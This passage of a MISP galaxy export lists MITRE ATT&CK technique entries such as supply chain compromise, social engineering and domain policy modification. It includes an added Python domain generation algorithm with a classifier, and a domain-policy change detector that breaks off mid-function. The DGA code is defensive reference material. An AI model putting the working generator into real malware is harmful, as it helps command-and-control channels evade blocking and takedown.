Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit organizational relationships. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)

The tag is: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276"

Identify supply chains - T1276 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265" with estimative-language:likelihood-probability="almost-certain"

Table 5913. Table References

Links

https://attack.mitre.org/techniques/T1276

Conduct social engineering - T1268

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1268).

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268"

Conduct social engineering - T1268 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1279" with estimative-language:likelihood-probability="almost-certain"

Table 5914. Table References

Links

https://attack.mitre.org/techniques/T1268

Assess targeting options - T1296

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1296).

An adversary may assess a target’s operational security (OPSEC) practices in order to identify targeting options. A target may share different information in different settings or be more or less cautious in different environments. (Citation: Scasny2015) (Citation: EverstineAirStrikes)

The tag is: misp-galaxy:mitre-attack-pattern="Assess targeting options - T1296"

Table 5915. Table References

Links

https://attack.mitre.org/techniques/T1296

Analyze data collected - T1287

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1287).

An adversary will assess collected information such as software/hardware versions, vulnerabilities, patch level, etc. They will analyze technical scanning results to identify weaknesses in the configuration or architecture. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper) (Citation: RSA-APTRecon) (Citation: FireEyeAPT28)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze data collected - T1287"

Table 5916. Table References

Links

https://attack.mitre.org/techniques/T1287

Conduct social engineering - T1279

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1279).

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1279"

Conduct social engineering - T1279 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249" with estimative-language:likelihood-probability="almost-certain"

Table 5917. Table References

Links

https://attack.mitre.org/techniques/T1279

Access Call Log - T1433

On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data.

On iOS, applications do not have access to the call log, so privilege escalation would be required in order to access the data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433"

Table 5918. Table References

Links

https://attack.mitre.org/techniques/T1433

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Create backup infrastructure - T1339

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1339).

Backup infrastructure allows an adversary to recover from environmental and system failures. It also facilitates recovery or movement to other infrastructure if the primary infrastructure is discovered or otherwise is no longer viable. (Citation: LUCKYCAT2012)

The tag is: misp-galaxy:mitre-attack-pattern="Create backup infrastructure - T1339"

Table 5919. Table References

Links

https://attack.mitre.org/techniques/T1339

Remotely Install Application - T1443

An adversary with control of a target’s Google account can use the Google Play Store’s remote installation capability to install apps onto the Android devices associated with the Google account as described in (Citation: Oberheide-RemoteInstall), (Citation: Konoth). However, only applications that are available for download through the Google Play Store can be remotely installed using this technique.

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted or known insecure or malicious apps on devices.

Platforms: Android

The tag is: misp-galaxy:mitre-attack-pattern="Remotely Install Application - T1443"

Remotely Install Application - T1443 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 5920. Table References

Links

https://attack.mitre.org/techniques/T1443

Abuse Accessibility Features - T1453

This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.

A malicious app could abuse Android’s accessibility features to capture sensitive data or perform other malicious actions.(Citation: Skycure-Accessibility)

Adversaries may abuse accessibility features on Android to emulate a user’s clicks, for example to steal money from a user’s bank account.(Citation: android-trojan-steals-paypal-2fa)(Citation: banking-trojans-google-play)

Adversaries may abuse accessibility features on Android devices to evade defenses by repeatedly clicking the "Back" button when a targeted app manager or mobile security app is launched, or when strings suggesting uninstallation are detected in the foreground. This effectively prevents the malicious application from being uninstalled.(Citation: android-trojan-steals-paypal-2fa)

The tag is: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453"

Table 5921. Table References

Links

https://attack.mitre.org/techniques/T1453

https://www.skycure.com/blog/accessibility-clickjacking/

https://www.welivesecurity.com/2018/10/24/banking-trojans-continue-surface-google-play/

https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Access Calendar Entries - T1435

An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435"

Table 5922. Table References

Links

https://attack.mitre.org/techniques/T1435

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Create custom payloads - T1345

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1345).

A payload is the part of the malware which performs a malicious action. The adversary may create custom payloads when none exist with the needed capability or when targeting a specific environment. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Create custom payloads - T1345"

Table 5923. Table References

Links

https://attack.mitre.org/techniques/T1345

Manipulate Device Communication - T1463

If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to adversary-in-the-middle attacks (Citation: FireEye-SSL).

The tag is: misp-galaxy:mitre-attack-pattern="Manipulate Device Communication - T1463"

Table 5924. Table References

Links

https://attack.mitre.org/techniques/T1463

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html

https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html

Commonly Used Port - T1436

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.

They may use commonly open ports such as

  • TCP:80 (HTTP)

  • TCP:443 (HTTPS)

  • TCP:25 (SMTP)

  • TCP/UDP:53 (DNS)

They may use the protocol associated with the port or a completely different protocol.

The tag is: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1436"

Table 5925. Table References

Links

https://attack.mitre.org/techniques/T1436

Application Layer Protocol - T1437

Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the mobile device, and often the results of those commands, will be embedded within the protocol traffic between the mobile device and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS.

The tag is: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437"

Table 5926. Table References

Links

https://attack.mitre.org/techniques/T1437

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html

Domain Generation Algorithms - T1483

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there could potentially be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)

Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server, malware may employ a DGA as a means of reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
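To make the two constructions above concrete, here is an added example (written for this page; it is not code from MITRE, from the cited reports, or from any real malware family) that implements a time-and-seed-keyed DGA in both the per-letter and the whole-word style, and then the lexical triage a defender would run over observed query names. The seed, the tiny word list, the TLDs and the thresholds are assumptions chosen for illustration; the two names `istgmxdejdnxuyla.ru` and `cityjulydish.net` are the page's own examples reused as test input.

```python
"""Time-seeded DGA in the two styles the text describes, plus lexical triage.

Added example, not code from MITRE or from any real malware family; the
seed, word list, TLDs and thresholds are assumptions for illustration."""
import hashlib
from datetime import date
from typing import Iterator, List

TLDS = ("ru", "net", "com")
# Small dictionary used both to build word-based names and to score them.
WORDS = ("city", "july", "dish", "river", "stone", "apple", "north", "light")


def _stream(seed: int, day: date) -> Iterator[int]:
    """Deterministic byte stream from seed and date: same inputs, same domains."""
    state = hashlib.sha256(f"{seed}:{day.isoformat()}".encode()).digest()
    while True:
        yield from state
        state = hashlib.sha256(state).digest()


def gibberish_dga(seed: int, day: date, count: int = 5, length: int = 16) -> List[str]:
    """Per-letter construction (istgmxdejdnxuyla.ru style)."""
    rng = _stream(seed, day)
    names = []
    for _ in range(count):
        label = "".join(chr(ord("a") + next(rng) % 26) for _ in range(length))
        names.append(f"{label}.{TLDS[next(rng) % len(TLDS)]}")
    return names


def wordlist_dga(seed: int, day: date, count: int = 5, words: int = 3) -> List[str]:
    """Whole-word construction (cityjulydish.net style)."""
    rng = _stream(seed, day)
    names = []
    for _ in range(count):
        label = "".join(WORDS[next(rng) % len(WORDS)] for _ in range(words))
        names.append(f"{label}.{TLDS[next(rng) % len(TLDS)]}")
    return names


def word_coverage(label: str) -> float:
    """Fraction of the label explained by dictionary words (greedy longest match)."""
    i, covered = 0, 0
    while i < len(label):
        match = max((w for w in WORDS if label.startswith(w, i)), key=len, default=None)
        if match is None:
            i += 1
        else:
            covered += len(match)
            i += len(match)
    return covered / len(label) if label else 0.0


def classify(fqdn: str) -> str:
    """Heuristic verdict for one query name: gibberish, wordlist-or-benign, benign."""
    label = fqdn.lower().split(".")[0]
    if not label:
        return "benign"
    if word_coverage(label) >= 0.8:
        # Dictionary-built names pass a lexical check. That is exactly why
        # word-based DGAs exist, and why seed recovery and sinkholing beat scoring.
        return "wordlist-or-benign"
    vowel_ratio = sum(c in "aeiou" for c in label) / len(label)
    if len(label) >= 12 and vowel_ratio < 0.35:
        return "gibberish"
    return "benign"


def predicted_domains(seed: int, day: date) -> List[str]:
    """What a defender who has recovered the seed can pre-register or sinkhole for a day."""
    return gibberish_dga(seed, day) + wordlist_dga(seed, day)


if __name__ == "__main__":
    today = date(2019, 2, 1)   # fixed date so the output is reproducible
    for name in predicted_domains(0x5EED, today):
        print(name, classify(name))
```

The point of `predicted_domains` is the defender's side of the time-based design: once the seed and the date formula are recovered from a sample, tomorrow's domains are known today and can be registered or sinkholed before the malware asks for them, which is the takeover the first paragraph says DGAs make harder but not impossible. The classifier is intentionally crude; it is there to show that entropy and vowel-ratio scoring catches the per-letter style and is blind to the whole-word style.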

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1483"

Table 5927. Table References

Links

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

http://csis.pace.edu/ctappert/srd2017/2017PDF/d4.pdf

http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf

https://arxiv.org/pdf/1611.00791.pdf

https://attack.mitre.org/techniques/T1483

https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/

https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

Transmitted Data Manipulation - T1493

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1493"

Table 5928. Table References

Links

https://attack.mitre.org/techniques/T1493

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Subvert Trust Controls - T1553

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.

Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates)

The tag is: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553"

Table 5929. Table References

Links

http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates

https://attack.mitre.org/techniques/T1553

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

Revert Cloud Instance - T1536

An adversary may revert changes made to a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.

Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)

The tag is: misp-galaxy:mitre-attack-pattern="Revert Cloud Instance - T1536"

Table 5930. Table References

Links

https://attack.mitre.org/techniques/T1536

https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots

https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/

Test callback functionality - T1356

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1356).

Callbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached. (Citation: LeeBeaconing)

The tag is: misp-galaxy:mitre-attack-pattern="Test callback functionality - T1356"

Table 5931. Table References

Links

https://attack.mitre.org/techniques/T1356

Cloud Service Dashboard - T1538

An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)

Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Service Dashboard - T1538"

Table 5932. Table References

Links

https://attack.mitre.org/techniques/T1538

https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard

https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html

Remote Access Software - T1663

Adversaries may use legitimate remote access software, such as VNC, TeamViewer, AirDroid, AirMirror, etc., to establish an interactive command and control channel to target mobile devices.

Remote access applications may be installed and used post-compromise as an alternate communication channel for redundant access or as a way to establish an interactive remote session with the target device. They may also be used as a component of malware to establish a reverse connection to an adversary-controlled system or service. Installation of remote access tools may also include persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1663"

Table 5933. Table References

Links

https://attack.mitre.org/techniques/T1663

Protected User Data - T1636

Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list. These permissions need to be declared ahead of time. On Android, they must be included in the application’s manifest. On iOS, they must be included in the application’s Info.plist file.

In almost all cases, the user is required to grant access to the data store that the application is trying to access. In recent OS versions, vendors have introduced additional privacy controls for users, such as the ability to grant permission to an application only while the application is being actively used by the user.

If the device has been jailbroken or rooted, an adversary may be able to access [Protected User Data](https://attack.mitre.org/techniques/T1636) without the user’s knowledge or approval.

The tag is: misp-galaxy:mitre-attack-pattern="Protected User Data - T1636"

Table 5934. Table References

Links

https://attack.mitre.org/techniques/T1636

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Disseminate removable media - T1379

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1379).

Removable media containing malware can be injected in to a supply chain at large or small scale. It can also be physically placed for someone to find or can be sent to someone in a more targeted manner. The intent is to have the user utilize the removable media on a system where the adversary is trying to gain access. (Citation: USBMalwareAttacks) (Citation: FPDefendNewDomain) (Citation: ParkingLotUSB)

The tag is: misp-galaxy:mitre-attack-pattern="Disseminate removable media - T1379"

Table 5935. Table References

Links

https://attack.mitre.org/techniques/T1379

Spearphishing for Information - T1397

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1397).

Spearphishing for information is a specific variant of spearphishing. Spearphishing for information is different from other forms of spearphishing in that it doesn’t leverage malicious code. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials, without involving malicious code. Spearphishing for information frequently involves masquerading as a source with a reason to collect information (such as a system administrator or a bank) and providing a user with a website link to visit. The given website often closely resembles a legitimate site in appearance and has a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Spearphishing for information may also try to obtain information directly through the exchange of emails, instant messengers or other electronic conversation means. (Citation: ATTACKREF GRIZZLY STEPPE JAR)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing for Information - T1397"

Table 5936. Table References

Links

https://attack.mitre.org/techniques/T1397

Ingress Tool Transfer - T1544

Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions. Files may be copied from an external adversary-controlled system through the command and control channel or through alternate protocols with another tool such as FTP.

The tag is: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1544"

Table 5937. Table References

Links

https://attack.mitre.org/techniques/T1544

Malicious SMS Message - T1454

Test

The tag is: misp-galaxy:mitre-attack-pattern="Malicious SMS Message - T1454"

Malicious SMS Message - T1454 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477" with estimative-language:likelihood-probability="almost-certain"

Table 5938. Table References

Links

https://attack.mitre.org/techniques/T1454

Supply Chain Compromise - T1474

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Supply chain compromise can take place at any stage of the supply chain including:

  • Manipulation of development tools

  • Manipulation of a development environment

  • Manipulation of source code repositories (public or private)

  • Manipulation of source code in open-source dependencies

  • Manipulation of software update/distribution mechanisms

  • Compromised/infected system images

  • Replacement of legitimate software with modified versions

  • Sales of modified/counterfeit products to legitimate distributors

  • Shipment interdiction

While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency, specifically with the widespread usage of third-party advertising libraries.(Citation: Grace-Advertisement)(Citation: NowSecure-RemoteCode)

The tag is: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474"

Table 5939. Table References

Links

https://attack.mitre.org/techniques/T1474

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-1.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-13.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-14.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-16.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-17.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-19.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-2.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-21.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-5.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-6.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-7.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-8.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html

https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf

https://www.nowsecure.com/blog/2015/06/15/a-pattern-for-remote-code-execution-using-arbitrary-file-writes-and-multidex-applications/

Delete Device Data - T1447

Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. (Citation: Android DevicePolicyManager 2019)

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.

The tag is: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447"

Table 5940. Table References

Links

https://attack.mitre.org/techniques/T1447

https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html

Carrier Billing Fraud - T1448

A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases.

Performing SMS fraud relies heavily upon the fact that, when making SMS purchases, the carriers perform device verification but not user verification. This allows adversaries to make purchases on behalf of the user, with little or no user interaction.(Citation: Google Bread)

Malicious applications may also perform toll billing, which occurs when carriers provide payment endpoints over a web page. The application connects to the web page over cellular data so the carrier can directly verify the number, or the application must retrieve a code sent via SMS and enter it into the web page.(Citation: Google Bread)

On iOS, apps cannot send SMS messages.

On Android, apps must hold the SEND_SMS permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).

The tag is: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448"

Table 5941. Table References

Links

https://attack.mitre.org/techniques/T1448

https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html

https://static.googleusercontent.com/media/source.android.com/en//security/reports/Google_Android_Security_2014_Report_Final.pdf

Domain Policy Modification - T1484

Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.

With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).

Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.
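Both abuses described above leave records a defender can key on: a successful federation-settings change in the Azure AD audit log, and Windows Security event 5136 (directory service object modified) on an object of class groupPolicyContainer. The following is an added example written for this page, not code from MITRE and not the Sentinel rule the references link to: it parses a small set of records, raises one alert per trust change and per GPO modification, and applies the modify-then-revert observation from the last paragraph by flagging the same actor touching the same GPO twice within a short window. The record layout, the field names and the log lines themselves are constructed for the example; the operation names and the event ID are the values those logs use, but treat them as assumptions to confirm against your own export.

```python
"""Detection over domain-policy change records (T1484).

Added example, not code from MITRE or from the linked Sentinel rule. The
record fields and the log lines below are constructed for this example;
the GPO GUID is the well-known Default Domain Policy identifier."""
import json
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Azure AD audit operations that alter a domain's federation trust.
FEDERATION_OPS = {"Set federation settings on domain", "Set domain authentication"}
# Windows Security event 5136 (directory object modified) on a GPO object.
GPO_EVENT, GPO_CLASS = 5136, "groupPolicyContainer"
REVERT_WINDOW = timedelta(minutes=30)

SAMPLE_LOG = """\
{"source": "AzureADAudit", "time": "2020-12-14T02:10:05Z", "actor": "svc-adsync@corp.example", "op": "Set federation settings on domain", "target": "corp.example", "result": "success"}
{"source": "SecurityLog", "time": "2020-12-14T02:41:10Z", "actor": "j.doe@corp.example", "event_id": 5136, "object_class": "groupPolicyContainer", "target": "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=corp,DC=example", "attribute": "gPCMachineExtensionNames"}
{"source": "SecurityLog", "time": "2020-12-14T02:52:33Z", "actor": "j.doe@corp.example", "event_id": 5136, "object_class": "groupPolicyContainer", "target": "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=corp,DC=example", "attribute": "gPCMachineExtensionNames"}
{"source": "SecurityLog", "time": "2020-12-14T03:00:00Z", "actor": "j.doe@corp.example", "event_id": 4624, "target": "DC01"}
{"source": "AzureADAudit", "time": "2020-12-14T09:15:00Z", "actor": "admin@corp.example", "op": "Add user", "target": "new.hire@corp.example", "result": "success"}
"""


def parse(log: str) -> List[Dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in log.splitlines() if line.strip()]


def detect(records: List[Dict]) -> List[str]:
    """Alerts for federation trust changes, GPO edits, and quick modify-and-revert pairs."""
    alerts: List[str] = []
    gpo_mods: Dict[tuple, List[datetime]] = defaultdict(list)   # (actor, target) -> times
    for r in records:
        ts = datetime.strptime(r["time"], "%Y-%m-%dT%H:%M:%SZ")
        if r.get("source") == "AzureADAudit" and r.get("op") in FEDERATION_OPS and r.get("result") == "success":
            alerts.append(f"federation trust changed on {r['target']} by {r['actor']} at {r['time']}")
        elif r.get("event_id") == GPO_EVENT and r.get("object_class") == GPO_CLASS:
            alerts.append(f"GPO {r['target']} attribute {r['attribute']} modified by {r['actor']} at {r['time']}")
            gpo_mods[(r["actor"], r["target"])].append(ts)
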